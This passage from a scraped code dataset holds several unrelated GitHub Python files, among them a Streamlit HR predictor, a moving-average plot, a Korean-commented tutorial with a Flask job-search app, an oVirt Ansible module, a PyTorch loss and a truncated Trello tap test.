main()\n","repo_name":"MattiaLimone/dnn-hmm","sub_path":"training/mlp_predictor_train_script.py","file_name":"mlp_predictor_train_script.py","file_ext":"py","file_size_in_byte":3812,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"14728141642","text":"import streamlit as st\r\nimport pickle\r\nmodel = pickle.load(open('model.pkl','rb'))\r\n\r\ndef predict(sl):\r\n prediction = model.predict([[sl]])\r\n return prediction\r\ndef main():\r\n st.title(\"HR Analytics - Employee retention\")\r\n html_temp = \"\"\"\r\n \r\n
      \r\n

      Streamlit HR Analytics - Employee retention

      \r\n
      If the Prediction is 0 – Person is Not looking for job change, 1 – Person is Looking for a job change
      \r\n
      \r\n \r\n\r\n\r\n \"\"\"\r\n if st.button(\"About\"):\r\n st.text(\"Output: 0 – Not looking for job change\")\r\n st.text(\"Output: 1 – Looking for a job change \")\r\n\r\n st.markdown(html_temp,unsafe_allow_html=True)\r\n sl = st.text_input(\"Enrollee ID\",\"Type Here\")\r\n \r\n\r\n result = \"\"\r\n if st.button(\"Predict\"):\r\n result = predict(sl)\r\n\r\n st.success('The output is = {}'.format(result))\r\n \r\nmain()","repo_name":"ReddyYesh/Assignment","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3168294347","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndf=pd.read_csv('data.csv')\narr = df.to_numpy()\n\n\n# ANALYSING DATA \n\n# Convert 'datetime' column to datetime type\ndf['datetime'] = pd.to_datetime(df['datetime'])\n\n# Calculate short-term (e.g., 50 days) and long-term (e.g., 200 days) SMAs\nshort_window = 50\nlong_window = 200\n\ndf['SMA50'] = df['close'].rolling(window=short_window, min_periods=1).mean()\ndf['SMA200'] = df['close'].rolling(window=long_window, min_periods=1).mean()\n\n# Create signals based on SMA crossovers\ndf['Signal'] = 0 # 0 represents no signal\ndf['Signal'][df['SMA50'] > df['SMA200']] = 1 # 1 represents buy signal\ndf['Signal'][df['SMA50'] < df['SMA200']] = -1 # -1 represents sell signal\n\n# Plot the closing prices and SMAs\nplt.figure(figsize=(10, 6))\nplt.plot(df['datetime'], df['close'], label='Close Price')\nplt.plot(df['datetime'], df['SMA50'], label=f'SMA{short_window}')\nplt.plot(df['datetime'], df['SMA200'], label=f'SMA{long_window}')\n\n# Plot buy signals\nplt.plot(df[df['Signal'] == 1]['datetime'], df[df['Signal'] == 1]['SMA50'], '^', markersize=10, color='g', label='Buy Signal')\n\n# Plot sell signals\nplt.plot(df[df['Signal'] == -1]['datetime'], df[df['Signal'] == -1]['SMA50'], 'v', markersize=10, color='r', label='Sell Signal')\n\nplt.title('Simple Moving Average Crossover Strategy')\nplt.xlabel('Date')\nplt.ylabel('Closing Price')\nplt.legend()\nplt.show()","repo_name":"deep-69bits/INVSTO","sub_path":"dataAnalysis.py","file_name":"dataAnalysis.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23566325001","text":"#! /usr/bin/env python3\n\nimport sys\nimport heapq\n\n\ndef solve(n: int, k: int):\n\n rooms = [-n]\n last_room = n\n\n for i in range(k):\n\n room = -heapq.heappop(rooms)\n last_room = room\n\n if room > 2:\n heapq.heappush(rooms, -(room // 2))\n heapq.heappush(rooms, -((room - 1) // 2))\n\n elif room > 1:\n heapq.heappush(rooms, -1)\n\n return last_room // 2, (last_room - 1) // 2\n\n\ndef main():\n f = open(sys.argv[1], 'r')\n\n for i, line in enumerate(f):\n\n if i == 0:\n continue\n\n parts = line.split(' ')\n res = solve(n=int(parts[0]), k=int(parts[1]))\n print('Case #{}: {} {}'.format(i, *res))\n # print('Case {}: {} {}'.format(line.strip(), *res))\n\nif __name__ == '__main__':\n main()\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/1097.py","file_name":"1097.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4252525692","text":"# a = 2\n# b = 3\n# c = a + b\n# print(c)\n# # 파이썬은 코드를 위에서 아래로 읽느다.\n# my_age = 88\n# # snake기법으로 변수지정 camel기법도 가능은 함.\n# my_name = \"huibin\"\n# print(my_name)\n\n# is_live = True\n# print(is_live)\n# print(my_name , \"is\", my_age)\n\n# function 에 대해\n# 함수 만들때\n# def say_hello(e, user_age): #def 함수명(): 공백이 있어야 이 함수 안에 있다는것을 알수있음.\n# print(\"hello\", e, \"how r u\", user_age) #e : parameter\n# print(user_age)\n\n# say_hello(\"nic\", 12) #함수 호출 #nic, ddnic : argument\n# function에 몇개의 argument를 줄수있는가? parameter을 준만큼\n# 함수란 몇번이고 재사용이 가능한 코드\n# parameter 함수안으로 데이터를 보내 함수의 결과를 바꿀 수 있게 하는것\n\n# def tax_calculator(money):\n# print(money * 0.35)\n\n# def say_hello(user_call = \"anonymous\"): #user_call = \"\"값은 기본값을 주는 것.\n# print(\"hello\", user_call)\n\n# say_hello(\"no\")\n# say_hello()\n\n# 과제\n# def plus(a = 7, b = 2):\n# print(a + b)\n\n# def minus(a = 3, b = 7):\n# print(a - b)\n\n# def double(a = 3, b = 2):\n# print(a * b)\n\n# def power_Of(a = 1, b = 8):\n# print(a**b)\n\n# def divide( a= 8, b=2):\n# print(a/b)\n\n# plus(2, 3)\n# minus()\n# double(3, 5)\n# power_Of(2, 4)\n# divide()\n\n# def tax_calc(money):\n# # print(money * 0.35) console에 나타내기만함\n# return money * 0.35\n\n# def pay_tax(tax):\n# print(\"tank you\", tax)\n# pay_tax(tax_calc(144449444))\n\n# 2.8\n# my_name = \"nico\"\n# my_age = 20\n# my_color = \"red\"\n# 위의 변수를 바로 print하기위해서는 f를 앞에 붙이고 {}가 필요.\n# return은 값을 가지고 그걸 함수 바깥으로 준다.그리고 파이썬은 그값을 잡아 코드에 대입시켜준다.그리고 return을 쓰면 바로 함수 끝 return이후의 코드는 파이썬이 작동하지 않는다.\n# print(f\"hello {my_name} here, \")\n\n# def make_juice(fruit):\n# return f\"{fruit}+🏖\"\n# print(\"sfsfs\") >> 안나타남 왜냐면 return으로 함수를 끝냈기 때문\n\n# def add_ice(juice):\n# return f\"{juice}+🥇\"\n\n# def add_sugar(iced_juice):\n# return f\"{iced_juice}+🍍\"\n\n# juice = make_juice(\"🍔\")\n# cold = add_ice(juice)\n# perfect = add_sugar(cold)\n# print(perfect)\n\n# 3.0 if, else, elif(else if같은거)\n# password_correct = False\n# if password_correct:\n# print(\"HEre is yours\")\n# else:\n# print(\"no\")\n# winner = 8\n\n# if winner > 10:\n# print(\"winner win\")\n# elif winner < 10:\n# print(\"winner lose\")\n# else:\n# print(\"winner 10\")\n\n# input함수 : 사용자에게 질문, type함수, int() : 정수로 만듬 - built-in function\n# age = int(input(\"How old r u\"))\n# if age < 18:\n# print(\"no\")\n# elif 18 <= age and age < 35:\n# print(\"mid\")\n# elif age == 60 or age == 70:\n# print(\"birth\")\n# else :\n# print(\"yes\")\n#3.4\n\"\"\"\nfrom random import randint >>파이썬의 기본으로 가지고 있는 다양한 친구들?\n\nuser_choice = int(input(\"choose num\"))\npc_choice = randint(1, 50) #i imported this >>1부터 50중의 랜덤한 숫자를 고름.\n\nif user_choice == pc_choice:\n print(\"you won\")\nelif user_choice > pc_choice:\n print(\"lower\", pc_choice)\nelif user_choice < pc_choice:\n print(\"higher\")\n \n#3.5 while 내가 스탑하기 전까지 계속 동작, if와 비슷 벗 멈추지 않는다.\n# 조건이 false가 될때까지 동작함.\n\ndistance = 0\nwhile distance < 20:\n print(\"im running\", distance, \"km\")\n distance = distance + 1\n# distance가 20이 되는 순간 함수는 멈춤.\n\nfrom random import randint\n\nprint(\"welcome\")\npc_choice = randint(1, 50) #i imported this\n# pc가 1-50의 랜던숫자 픽\nplaying = True\n\nwhile playing: #true일때만 진행되는 게임\n user_choice = int(input(\"choose num(1-50)\"))\n if user_choice == pc_choice:\n print(\"you won\")\n playing = False #맞추면 게임 중지시키기\n elif user_choice > pc_choice:\n print(\"lower\", pc_choice)\n elif user_choice < pc_choice:\n print(\"higher\")\n\n \n\"\"\"\n# 4.0 method\n# python의 데이터 구조 (3가지)\n# data structure(자료구조): 데이터를 구조화하고 싶을 때 사용\n# 1. list 2. tuple 3. dictionary\n# method : 데이터 뒤에 결합/연결된 function >> name.count(), upper()\n# name = \"lora\"\n# print(name.endswith(\"o\")), reverse, clear()\n# list\n# days_of_week = [\"Mon\", \"Tue\", \"Wed\", \"Thu\", \"Fri\", [1,2,3], True]\n# print(days_of_week[5])\n\n# 2. tuple : 불변성을 가진다. 즉, 튜플을 변경하지 못한다.\n# days = (\"Mon\", \"Tue\", \"Wed\")\n# print(days[-1])\n\n# 3. dictionary\n# 사전하면 단어와 정의가 있다. key-value로 보면 됨. key(단어) value(정의)\n# player = {\n# 'name': 'nico',\n# 'age' : 12,\n# 'alive' : True,\n# 'food': [\"🥐\", \"🍊\"],\n# 'friend': {\n# \"name\" : \"lynn\",\n# \"food\" : [\"dd\"]\n# }\n# }\n# player['xp'] = 23333 >>key-value 추가하기\n# player['food'] = \"🍊\" >>변경하기\n# print(player['friend']['food'])\n# print(player.get('food')) >> food라는 key값 불러올때\n\n#4.4 loop\n'''\nfrom requests import get\n\nwebsites = [\n \"google.com\", \"https://httpstat.us/502\", \"https://httpstat.us/404\",\n \"https://httpstat.us/300\", \"https://httpstat.us/200\",\n \"https://httpstat.us/101\"\n]\n#https://httpstat.us/xxx is service for generating HTTP codes\n\nresults = {}\n\n#for(loop)\nfor website in websites: #웹사이트 리스트 안의 내용들 하나씩\n if not website.startswith(\"https://\"): #하나씩 만약 http://로 시작안하는 친구들은\n website = f\"https://{website}\" #붙여줘라.\n response = get(website) #response는 하나씩 가져온다.\n code_check = response.status_code #response만 프린트하면 string도 함께 나온다. 그래서 상태코드만 불러낼 수 잇다.\n\n if code_check == 200:\n # print(f\"{website} is ok\")\n results[website] = \"good\"\n elif code_check < 200:\n results[website] = \"continue\"\n elif code_check > 200 and code_check < 300:\n results[website] = \"ok\"\n elif 300 <= code_check < 400:\n results[website] = \"redirect\"\n elif 400 <= code_check < 500:\n results[website] = \"not good\"\n elif code_check > 500:\n results[website] = \"too bad\"\nprint(results)\n\n#pypi 사이트는 파이썬의 다양한 모듈을 사람들이 만들어 놓은 곳이다. 원하는 기능을 찾아서 사용가능하다.\n#4.6 requests : 내가 사이트로 이동할 때 request 된다.\n# 내 브라우저는 google 서버에 request를 보내고 google서버는 나한테 웹사이트를 보내준다.\n# get : function이다. 이동한 후 website를 가져오는 것.\n# get은 response를 return해준다.\n# response는 웹사이트의 응답이다.\n# 인터넷은 HTTP protocol에 기반한다. 그래서 컴터들이 서로 소통하는 방식은 http request이다.\n# 따라서 인터넷이 잘 작동되는지 확인하기 위해 http 상태 코드를 확인함.\n# response 200은 확인해보면 잘 작동한다는 뜻\n# 100은 continue를 의미, 200성공적, 300 redirection cash, 400은 잘 안됬을때 , 500 error\n'''\n\n#5.1 웹스크래핑 : 너가 쓴 코드가 웹사이트에 들어가서 데이터를 추출해내는 것.\n# beautifulsoup을 통해 html의 언어를 파이썬으로 가져올 수 있다.\n#beautifulsoup는 모든 것을 파이썬의 데이터 구조로 우리가 쓸 수 있는 entity를 가져온다.\n'''\n#class_= \"jobs\" >>keyword argument은 자리에 신경쓰지 않고 argument의 이름에 신경쓰겠다는 것이다.\n#\ndef say_hello(name, age):\n print(f\"Hello {name} {age}\")\n\nsay_hello(\"nico\", 12) #자리의 순서가 중요한 표현법\nsay_hello(age = 12, name = \"nico\") #자리보다 네임이 중요한 표현법\n\n#\npython에서 object의 list를 가지고 있고 list의 길이를 안다면 변수를 일일이 저장하지 않아도 한번에 지정이 가능하다. array나 list\nex) list_of_num = [1, 2, 3]\n first, second, third = list_of_num \n'''\n\n\n# recursive = False => 바로 아래만 찾아줌\n# mosaic zone까지 바로 포함되는 문제점있음\n#jobs = job_list.find_all('li', recursive=False)\n# None 은 아무것도 없을 때\n#5.17 .replace(\",\" , \" \") >>> 콤마를 스페이스로 대체한다.\n\n# from extractors.indeed import extract_indeed_jobs\n# from extractors.wwr import extract_wwr_jobs\n# from file import save_to_file\n\n# keyword = input(\"What do you want to search?\")\n# indeed = extract_indeed_jobs(keyword)\n# wwr = extract_wwr_jobs(keyword)\n# jobs = indeed + wwr\n\n# save_to_file(keyword, jobs)\n\n# 6.0 flask 는 웹사이트를 만들고, 사용자 입력을 처리하고, 파일을 전달하고, html파일을 user에게 보여줌\nfrom flask import Flask, render_template, request, redirect, send_file\nfrom extractors.indeed import extract_indeed_jobs\nfrom extractors.wwr import extract_wwr_jobs\nfrom file import save_to_file\n#request : 브라우저가 웹사이트에 가서 콘텐츠를 요청하는 것이다.\n\n#user에 응답\napp = Flask(__name__)\n\n@app.route(\"/\") #decorator html과 연동\ndef home():\n return render_template(\"home.html\", name=\"huibin\") \n #html에 변수주기\n #name = \"huibin\"이라는 request가 도착하면 Flask는 변수를 가지고 html 템플릿 안에 있는 변수를 request한 값으로 대체하여 user에게 전달된다.\n #위의 상황을 rendering이라 한다.\ndb = {}\n\n@app.route(\"/search\")\ndef search():\n keyword = request.args.get(\"keyword\")\n if keyword == \"\":\n return redirect(\"/\")\n if keyword in db:\n jobs = db[keyword]\n else:\n indeed = extract_indeed_jobs(keyword)\n wwr = extract_wwr_jobs(keyword)\n jobs = indeed + wwr\n db[keyword] = jobs\n return render_template(\"search.html\", keyword=keyword, jobs=jobs)\n\n#파일로 export하기 위해 만든 함수.\n@app.route(\"/export\") #url 설정\ndef export():\n keyword = request.args.get(\"keyword\") #키워드 가져오기\n if keyword == \"\": #키워드 안찾고 search버튼 누를경우 리다이렉트\n return redirect(\"/\")\n if keyword == None: #키워드가 없을 경우 리다이렉트\n return redirect(\"/\")\n if keyword not in db: #우리의 데이터베이스에 없을경우에 그 키워드를 search하는 페이지로 이동\n return redirect(f\"/search?keyword={keyword}\")\n save_to_file(keyword, db[keyword])\n return send_file(f\"{keyword}.csv\", as_attachment=True) #파일의이름, as_attachment=True는 다운로드 실행\n\napp.run(\"127.0.0.1\")","repo_name":"huibinkim/nomad-coder","sub_path":"python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10315,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36328419310","text":"import argparse\nimport sys\nimport re\n\nimport numpy as np\n\n\ndef pargs():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"file\")\n parser.add_argument(\"celltile\")\n parser.add_argument(\"-b\", \"--base\", help=\"Set the new base as.\")\n parser.add_argument(\"-k\", \"--kagome\", help=\"Element on the kagome sites.\")\n parser.add_argument(\"-i\", \"--interlayer\", help=\"Element on the interlayer sites.\")\n return parser.parse_args()\n\n\ndef herbertsmithite_hamming_ish_id(file, cell, new_base=None, kago=None, ilay=None):\n if kago is None:\n kago = \"Cu\"\n if ilay is None:\n ilay = \"Zn\"\n with open(file, \"r\") as f:\n txt = f.read()\n lines = txt.splitlines()\n i = 0\n j = -1\n for k, line in enumerate(lines):\n if line.lower().strip().startswith(r\"%block positions_frac\"):\n i = k\n if line.lower().strip().startswith(r\"%endblock positions_frac\"):\n j = k\n poslist = lines[i + 1 : j]\n posl = [\n (str(x[0]), tuple(map(float, x[1:])))\n for x in [line.strip().split() for line in poslist]\n if str(x[0]) in [kago, ilay]\n ]\n xyz = np.array([a for _, a in posl])\n basis = np.array([[1 / x] for x in cell if x > 1])\n basis_alt = np.array([[1 / x] for x in cell])\n base_site_ind = np.argwhere(\n (np.linalg.norm(xyz - 0.5, axis=1) - np.linalg.norm(basis / 2)) == 0\n )\n ks = base_site_ind.flatten()\n bs = xyz[ks]\n ks_ord = ks.copy()\n for d in range(2, -1, -1):\n ind = bs[:, d].argsort(kind=\"mergesort\")\n bs = bs[ind]\n ks_ord = ks_ord[ind]\n base_sites = xyz[ks_ord]\n base_entries = [posl[k] for k in ks_ord]\n base_ids = [s == kago for s, _ in base_entries]\n base_str = \"\".join(map(str, map(int, base_ids)))\n if new_base is None:\n return base_str\n if \"1\" in base_str:\n print(f\"Base cell must not have {kago} in interlayer.\", file=sys.stderr)\n sys.exit(1)\n new_ids = [bool(int(i)) for i in new_base]\n if len(new_ids) != len(ks):\n print(\n \"Something went wrong. Number of new entries different than number of base sites found.\"\n )\n sys.exit(1)\n flips = ks_ord[new_ids]\n unord_flip_ids = np.searchsorted(ks, flips)\n k = 0\n new_poslist = []\n for line in poslist:\n if ilay in line:\n if k in unord_flip_ids:\n new_poslist.append(re.sub(ilay, kago, line))\n else:\n new_poslist.append(line)\n k += 1\n else:\n new_poslist.append(line)\n return \"\\n\".join(lines[: i + 1] + new_poslist + lines[j:])\n\n\ndef main():\n ns = pargs()\n cell = tuple(map(int, ns.celltile.split(\"x\")))\n print(herbertsmithite_hamming_ish_id(ns.file, cell, ns.base, ns.kagome, ns.interlayer))\n","repo_name":"ScottNotFound/skit","sub_path":"skit/scripts/herby.py","file_name":"herby.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"691406915","text":"#!/usr/bin/env python\n\n\"\"\"\nCLI entrypoint\n\"\"\"\n\nfrom __future__ import print_function\n\nimport json\nimport pprint\nimport textwrap\nfrom argparse import ArgumentParser\nfrom os import path\nfrom pprint import pprint\nfrom subprocess import CalledProcessError\nfrom sys import stdout, version_info\n\nfrom offutils_strategy_register import fetch_node, list_nodes\nfrom pkg_resources import resource_filename\n\nfrom .__init__ import __version__, root_logger\nfrom .process_node import ProcessNode\n\nif version_info[0] == 3:\n from io import StringIO\n from itertools import filterfalse\nelse:\n try:\n from cStringIO import StringIO\n except ImportError:\n from StringIO import StringIO\n from itertools import ifilterfalse as filterfalse\n\n\ndef _build_parser():\n \"\"\"\n Parser constructing function\n\n :return: instanceof ArgumentParser\n :rtype: ```ArgumentParser```\n \"\"\"\n parser = ArgumentParser(\n prog=\"python -m offregister\",\n description=\"Register node to cluster(s). Node is found by manual specification, or popped from a queue.\",\n epilog=\"Example usage: %(prog)s -q etcd -r mesos:location -r etcd:location -r consul:location\",\n )\n parser.add_argument(\"-d\", \"--dns\", help=\"DNS for node (if no queue)\")\n parser.add_argument(\"-i\", \"--ip\", help=\"Public IP for node (if no queue)\")\n parser.add_argument(\n \"-q\", \"--queue\", help='Type of queue. Default: \"etcd\"', default=\"etcd\"\n )\n parser.add_argument(\n \"-l\",\n \"--queue-location\",\n help='Location of queue. Default: \"http://localhost:2379\"',\n default=\"http://localhost:2379\",\n )\n parser.add_argument(\n \"-r\",\n \"--register\",\n nargs=\"+\",\n help=\"Join node to which cluster(s). Example: mesos:location, etcd:location\",\n )\n parser.add_argument(\n \"-c\",\n \"--config\",\n help=\"Schema file. Can use the same one across all off- CLIs.\",\n default=path.join(\n path.dirname(resource_filename(\"offregister\", \"__main__.py\")),\n \"_config\",\n \"register.sample.json\",\n ),\n )\n parser.add_argument(\n \"-w\",\n \"--within\",\n help=\"Clusters to set nodes within [/unclustered/* (from .json conf)]\",\n )\n parser.add_argument(\n \"-m\",\n \"--method\",\n help=\"Method to run. E.g.: `tail` or `set_clusters`. [set_clusters]\",\n default=\"set_clusters\",\n )\n parser.add_argument(\n \"-a\",\n \"--method-args\",\n help='Method args. Use with --method. Example: \"-f -n 20\"',\n default=tuple(),\n )\n parser.add_argument(\n \"--version\", action=\"version\", version=\"%(prog)s {}\".format(__version__)\n )\n return parser\n\n\ndef process_within(register_within, config, method, method_args):\n \"\"\"\n Helper function to process a collection of tasks from a dictionary\n\n :param register_within: List of clusters to register the node's operation to\n :type register_within: ```Iterable[str]```\n\n :param config: dictionary for config\n :type config: ```dict```\n\n :param method: Which method to run\n :type method: ```str```\n\n :param method_args: Arguments to provide to the function by the `method` name\n :type method_args: ```Tuple[str]```\n \"\"\"\n if not len(register_within):\n raise Exception(\"No clusters found to join this node to\")\n\n for cluster_location in register_within:\n if cluster_location.endswith(\"*\"):\n cluster_location = cluster_location[:-2]\n ProcessNode.validate_conf(config, cluster_location)\n process_nodes(cluster_location, config, method, method_args)\n\n\n# From https://stackoverflow.com/a/4303996\ndef pprint_OrderedDict(object, **kwrds):\n \"\"\"\n Pretty print an OrderedDict\n\n :param object: Input container\n :type object: ```OrderedDict```\n\n :param kwrds: Keyword arguments\n :type kwrds: ```dict```\n \"\"\"\n try:\n width = kwrds[\"width\"]\n except KeyError: # unlimited, use stock function\n pprint(object, **kwrds)\n return\n buffer = StringIO()\n stream = kwrds.get(\"stream\", stdout)\n kwrds.update({\"stream\": buffer})\n pprint(object, **kwrds)\n words = buffer.getvalue().split()\n buffer.close()\n\n print(textwrap.fill(\" \".join(words), width=width), file=stream)\n\n\ndef process_nodes(cluster_location, config, method, method_args):\n \"\"\"\n Helper function that runs methods against cluster location with given config\n\n :param cluster_location: Cluster to register the node's operation to\n :type cluster_location: ```str```\n\n :param config: dictionary for config\n :type config: ```dict```\n\n :param method: Which method to run\n :type method: ```str```\n\n :param method_args: Arguments to provide to the function by the `method` name\n :type method_args: ```Tuple[str]```\n \"\"\"\n clustering_results = []\n if cluster_location.rpartition(\"/\")[2] == \"local\":\n nodes = (\"local\",)\n else:\n nodes = list_nodes(cluster_location, marshall=json)\n if len(nodes) == 0:\n try:\n nodes = (fetch_node(cluster_location),) # try exact match\n except StopIteration:\n raise AssertionError(\"No node found at {!r}\".format(cluster_location))\n assert len(nodes), \"No nodes found at {!r}\".format(cluster_location)\n for node_res in nodes:\n try:\n process_node_obj = ProcessNode(config, node_res, clustering_results)\n getattr(process_node_obj, method)(cluster_location, *method_args)\n clustering_results = process_node_obj.previous_clustering_results\n except CalledProcessError as e:\n root_logger.exception(e)\n\n pprint_OrderedDict(clustering_results)\n\n\nif __name__ == \"__main__\":\n args = _build_parser().parse_args()\n process_node = ProcessNode(args.config)\n\n process_within(\n args.within\n or {\n k: process_node.process_dict[\"register\"][k]\n for k in filterfalse(\n lambda key: key.startswith(\"_\"), process_node.process_dict[\"register\"]\n )\n },\n config=args.config,\n method=args.method,\n method_args=args.method_args,\n )\n","repo_name":"offscale/offregister","sub_path":"offregister/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":6204,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"29367280291","text":"ANSIBLE_METADATA = {'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'}\n\n\nDOCUMENTATION = '''\n---\nmodule: ovirt_host_facts\nshort_description: Retrieve facts about one or more oVirt/RHV hosts\nauthor: \"Ondra Machacek (@machacekondra)\"\nversion_added: \"2.3\"\ndescription:\n - \"Retrieve facts about one or more oVirt/RHV hosts.\"\nnotes:\n - \"This module creates a new top-level C(ovirt_hosts) fact, which\n contains a list of hosts.\"\noptions:\n pattern:\n description:\n - \"Search term which is accepted by oVirt/RHV search backend.\"\n - \"For example to search host X from datacenter Y use following pattern:\n name=X and datacenter=Y\"\n all_content:\n description:\n - \"If I(true) all the attributes of the hosts should be\n included in the response.\"\n default: False\n version_added: \"2.7\"\n type: bool\nextends_documentation_fragment: ovirt_facts\n'''\n\nEXAMPLES = '''\n# Examples don't contain auth parameter for simplicity,\n# look at ovirt_auth module to see how to reuse authentication:\n\n# Gather facts about all hosts which names start with C(host) and\n# belong to data center C(west):\n- ovirt_host_facts:\n pattern: name=host* and datacenter=west\n- debug:\n var: ovirt_hosts\n'''\n\nRETURN = '''\novirt_hosts:\n description: \"List of dictionaries describing the hosts. Host attributes are mapped to dictionary keys,\n all hosts attributes can be found at following url: http://ovirt.github.io/ovirt-engine-api-model/master/#types/host.\"\n returned: On success.\n type: list\n'''\n\nimport traceback\n\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible.module_utils.ovirt import (\n check_sdk,\n create_connection,\n get_dict_of_struct,\n ovirt_facts_full_argument_spec,\n)\n\n\ndef main():\n argument_spec = ovirt_facts_full_argument_spec(\n pattern=dict(default='', required=False),\n all_content=dict(default=False, type='bool'),\n )\n module = AnsibleModule(argument_spec)\n\n if module._name == 'ovirt_hosts_facts':\n module.deprecate(\"The 'ovirt_hosts_facts' module is being renamed 'ovirt_host_facts'\", version=2.8)\n\n check_sdk(module)\n\n try:\n auth = module.params.pop('auth')\n connection = create_connection(auth)\n hosts_service = connection.system_service().hosts_service()\n hosts = hosts_service.list(\n search=module.params['pattern'],\n all_content=module.params['all_content'],\n )\n module.exit_json(\n changed=False,\n ansible_facts=dict(\n ovirt_hosts=[\n get_dict_of_struct(\n struct=c,\n connection=connection,\n fetch_nested=module.params.get('fetch_nested'),\n attributes=module.params.get('nested_attributes'),\n ) for c in hosts\n ],\n ),\n )\n except Exception as e:\n module.fail_json(msg=str(e), exception=traceback.format_exc())\n finally:\n connection.close(logout=auth.get('token') is None)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"amitvashist7/ansible-development-CTS","sub_path":"molecule/my_env/lib/python2.7/site-packages/ansible/modules/cloud/ovirt/_ovirt_hosts_facts.py","file_name":"_ovirt_hosts_facts.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"9364951389","text":"#\n# @lc app=leetcode.cn id=482 lang=python3\n#\n# [482] 密钥格式化\n#\n\n# @lc code=start\nclass Solution:\n def licenseKeyFormatting(self, S: str, K: int) -> str:\n S = S.upper().replace(\"-\",\"\")\n mod = len(S)% K\n result = \"\"\n if mod:\n result += S[:mod]+\"-\"\n for x in range(mod,len(S),K):\n result += S[x:x+K] +\"-\"\n result = result[:-1]\n return result\n# @lc code=end\n\n","repo_name":"mqinbin/python_leetcode","sub_path":"482.密钥格式化.py","file_name":"482.密钥格式化.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1205282928","text":"import torch\nfrom torch.nn import CrossEntropyLoss\nimport torch.nn.functional as F\n\n\nfrom config import * #SPECIAL TOKENS\n\ndef get_loss(ignore_index=PAD_TOKEN, smooth=0):\n return CELoss(ignore_index=ignore_index, smooth=smooth)\n\n\n\nclass CELoss(CrossEntropyLoss):\n def __init__(self, ignore_index=0, smooth=0):\n super().__init__(ignore_index=ignore_index)\n self.smooth = smooth\n\n def forward(self, pred, trg):\n if pred.nelement() == 0 or trg.nelement()==0:\n return None\n pred = pred.contiguous().view(-1, pred.shape[-1])\n trg = trg.contiguous().view(-1)\n\n if self.smooth>0:\n n_class = pred.shape[1]\n onehot = torch.zeros_like(pred).scatter(1,trg.view(-1,1), 1)\n onehot = onehot *( 1- self.smooth) + (1-onehot) *self.smooth / (n_class-1) # -1 for original target\n logprob = F.log_softmax(pred, dim=1)\n\n donotpad = (trg!=PAD_TOKEN)\n loss = -(onehot * logprob).sum(dim=1)\n loss = loss.masked_select(donotpad).mean()\n else:\n loss = super().forward(pred, trg)\n\n return loss\n","repo_name":"sonsus/papago_test","sub_path":"losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17074962269","text":"import os\nimport logging\nimport unittest\nfrom datetime import datetime as dt\nfrom datetime import timedelta\nfrom functools import reduce\n\nimport tap_tester.connections as connections\nimport tap_tester.menagerie as menagerie\nimport tap_tester.runner as runner\nimport trello_utils as utils\n\n\nclass TrelloBookmarkStates(unittest.TestCase):\n START_DATE = \"\"\n START_DATE_FORMAT = \"%Y-%m-%dT00:00:00Z\"\n TEST_TIME_FORMAT = \"%Y-%m-%dT%H:%M:%S.%fZ\"\n LOOKBACK_WINDOW = 1 # days\n TEST_BOARD_ID = utils.NEVER_DELETE_BOARD_ID\n\n \"\"\"\n Below we define the formatting for the various bookmark states. The actual values\n are set in the test. These states should be considered as different possibilities\n for a given sync NOT as continuations of each other.\n e.g. sync_0 is a standard sync, sync_1 simulates a killed job in the middle of a sync\n \"\"\"\n ACTIONS_STATES = {\n \"state_0\": { # Final state after standard sync\n \"window_start\": 0,\n },\n \"state_1\": { # State of interrupted sync for Inc streams\n \"parent_id\": TEST_BOARD_ID,\n \"window_start\": 0, \"sub_window_end\": 0, \"window_end\": 0\n },\n \"state_2\": { # State of interrupted sync for Full Table streams\n \"window_start\": 0, \"window_end\": 0,\"parent_id\": TEST_BOARD_ID\n },\n }\n\n def setUp(self):\n missing_envs = [x for x in [\n \"TAP_TRELLO_CONSUMER_KEY\",\n \"TAP_TRELLO_CONSUMER_SECRET\",\n \"TAP_TRELLO_ACCESS_TOKEN\",\n \"TAP_TRELLO_ACCESS_TOKEN_SECRET\",\n ] if os.getenv(x) == None]\n if len(missing_envs) != 0:\n raise Exception(\"Missing environment variables: {}\".format(missing_envs))\n\n def name(self):\n return \"tap_tester_trello_bookmark_states\"\n\n def get_type(self):\n return \"platform.trello\"\n\n def get_credentials(self):\n return {\n 'consumer_key': os.getenv('TAP_TRELLO_CONSUMER_KEY'),\n 'consumer_secret': os.getenv('TAP_TRELLO_CONSUMER_SECRET'),\n 'access_token': os.getenv('TAP_TRELLO_ACCESS_TOKEN'),\n 'access_token_secret': os.getenv('TAP_TRELLO_ACCESS_TOKEN_SECRET'),\n }\n\n def get_tap_sorted_stream(self, stream: str = 'boards'):\n \"\"\"The tap sorts parent objects in created at ascending order\"\"\"\n objs = utils.get_objects(obj_type=stream)\n 